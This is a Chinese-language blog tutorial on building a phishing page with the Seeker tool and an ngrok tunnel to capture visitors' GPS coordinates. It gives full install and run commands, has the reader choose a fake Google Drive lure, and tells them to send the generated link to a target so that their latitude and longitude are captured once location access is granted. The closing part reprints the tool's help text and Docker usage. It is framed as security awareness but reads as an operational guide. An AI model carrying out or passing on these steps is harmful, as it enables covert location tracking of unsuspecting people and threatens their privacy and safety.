通過釣魚網頁獲取訪問者GPS定位
阿新 • • 發佈:2022-05-25
title: 通過釣魚網頁獲取GPS定位 --Seeker
tags: Seeker嗅探定位
categories: Linux學習
abbrlink: 64792
date: 2021-02-18 18:03:47
通過釣魚網頁獲取GPS定位 --Seeker
在網際網路的世界裡,最不缺少的就是資訊,最容易獲取的也是資訊,在這個資訊互動的時代裡,你真能獨善其身?沒錯,你的安全只是相對的,而漏洞的存在則是絕對的!!!
Seeker -- WEB嗅探器
它可以幫你獲取來訪者的GPS位置資訊
本文章記錄一個釣魚網站的搭建和測試,旨在讓大家明白當我們瀏覽網頁時你個人資訊的一些流向。從而提高大家網路安全意識,讓壞人沒有可乘之機。科學技術是把雙刃劍,因此,在個人技術得到提高後請善待他人,永遠不要突破道德的底線!!! 下面讓我們進入正題。
大體思路:
通過Seeker在本機架設Web服務專案,然後用Ngrok開闢外網訪問隧道(內網穿透),當外網訪問時,Seeker即可探測到訪問者的一些資訊。
一、Seeker的安裝
專案地址:
https://github.com/thewhiteh4t/seeker.git
# 開啟命令列輸入 $ git clone https://github.com/thewhiteh4t/seeker.git $ cd seeker/ $ apt update $ apt install python3 python3-pip php $ pip3 install requests $ chmod +x install.sh
二、下載安裝Ngrok
1. 註冊Ngrok賬號
2. 根據電腦型號下載對應的安裝包
解壓下載好的安裝包
$ unzip /path/to/ngrok.zip
3. 配置Ngrok
#開啟終端輸入
./ngrok authtoken + 祕鑰
三、開始搭建
1. cd開啟到Seeker專案下啟動Seeker
$ cd seeker/
$ python3 seeker.py -t manual #啟動專案
2. 輸入1選中Google Drive
回車後輸入任意一個URL
至此Seeker啟動完成
3. 啟動Ngrok
cd開啟到Ngrok專案下啟動ngrok
$ ngrok http 8080 #埠號要與Seeker監聽的埠號一致
紅色框框內隨機生成的連結就是釣魚連結,可將它發給目標使用者訪問。
四、測試
1. 開啟釣魚連結
ngrok頁面內的HTTP Requests會有響應
此時客戶端的頁面如下
當用戶點選Request access
時會彈出
此時如果點選允許位置資訊就會暴露
此時Seeker端的畫面為
圖中紅框部分為目標經緯度
五、最後貼上Seeker原專案說明,不懂的地方可以查。
python3 seeker.py -h
usage: seeker.py [-h] [-s SUBDOMAIN]
optional arguments:
-h, --help show this help message and exit
-k KML, --kml Provide KML Filename ( Optional )
-p PORT, --port Port for Web Server [ Default : 8080 ]
-t TUNNEL, --tunnel Specify Tunnel Mode [ Available : manual ]
##################
# Usage Examples #
##################
# Step 1 : In first terminal
$ python3 seeker.py -t manual
# Step 2 : In second terminal start a tunnel service such as ngrok
$ ./ngrok http 8080
###########
# Options #
###########
# Ouput KML File for Google Earth
$ python3 seeker.py -t manual -k <filename>
# Use Custom Port
$ python3 seeker.py -t manual -p 1337
$ ./ngrok http 1337
################
# Docker Usage #
################
# Step 1
$ docker network create ngroknet
# Step 2
$ docker run --rm -it --net ngroknet --name seeker thewhiteh4t/seeker python3 seeker.py -t manual
# Step 3
$ docker run --rm -it --net ngroknet --name ngrok wernight/ngrok ngrok http seeker:8080